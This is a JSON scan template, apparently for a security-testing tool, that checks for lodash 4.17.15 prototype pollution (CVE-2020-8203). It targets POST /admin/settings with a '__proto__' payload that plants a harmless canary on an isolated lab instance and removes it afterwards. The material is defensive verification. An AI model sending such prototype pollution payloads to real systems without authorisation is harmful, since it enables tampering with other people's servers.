{
  "templateId": "lodash-prototype-canary-template",
  "title": "lodash 프로토타입 오염 canary 점검",
  "description": "대한대학교 lodash@4.17.15의 CVE-2020-8203 관련 경로를 확인하는 참고용 템플릿입니다. 격리된 임시 실습 인스턴스에서 관리자 세션 쿠키와 application/x-www-form-urlencoded 본문으로 payload 필드를 보냅니다. 기준 입력은 일반 경로 theme.ca3pTemplateProbe에 같은 값을 저장합니다. 공격 후 동일 서버 프로세스의 Object.prototype.ca3pTemplateProbe 값과 자신의 속성이 없는 새 객체의 상속값을 확인하고, 확인이 끝나면 해당 프로토타입 속성을 삭제하고 인스턴스를 폐기합니다. HTTP 302만으로 오염을 확정하지 않습니다. 세션·POST·프로세스 내부 관찰을 요구하므로 현재 자동 실행기는 지원하지 않습니다.",
  "attackType": { "name": "prototype_pollution", "cwe": "CWE-1321" },
  "dependency": { "runtime": "node", "framework": "express", "library": "lodash" },
  "target": { "method": "POST", "endpoint": "/admin/settings" },
  "request": { "packet": { "method": "POST", "path": "/admin/settings", "body": { "payload": "{{payload}}" } } },
  "blanks": {
    "origin": { "required": true, "type": "url" },
    "payload": { "required": true, "type": "string", "pickFrom": "payloads", "desc": "격리 인스턴스의 관리자 세션에서만 폼 payload 필드로 전송합니다. 확인 후 프로토타입 canary를 삭제합니다." }
  },
  "payloads": ["{\"path\":\"__proto__.ca3pTemplateProbe\",\"value\":\"ca3p-lodash-canary\"}"],
  "verify": { "mode": "prototypeCanary", "baseline": { "status": 302 }, "attack": { "status": 302 } },
  "executor": "guardrail",
  "trust": "unverified"
}
